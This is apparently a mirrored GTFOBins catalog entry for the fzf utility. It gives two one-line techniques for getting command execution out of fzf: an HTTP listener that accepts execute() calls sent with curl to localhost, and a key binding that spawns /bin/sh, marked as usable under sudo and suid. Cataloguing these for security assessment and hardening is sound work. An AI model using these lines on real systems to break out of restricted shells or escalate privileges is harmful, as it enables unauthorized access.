mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
28 lines
509 B
Plaintext
28 lines
509 B
Plaintext
---
|
|
functions:
|
|
command:
|
|
- code: |-
|
|
fzf --listen=12345
|
|
comment: |-
|
|
Commands can be issued via POST requests, for example:
|
|
|
|
```
|
|
curl http://localhost:12345 -d 'execute(/path/to/command)'
|
|
```
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
shell: true
|
|
unprivileged:
|
|
shell:
|
|
- code: |-
|
|
fzf --bind 'enter:execute(/bin/sh)'
|
|
comment: |-
|
|
Press `Enter` to receive the shell.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
shell: true
|
|
unprivileged:
|
|
...
|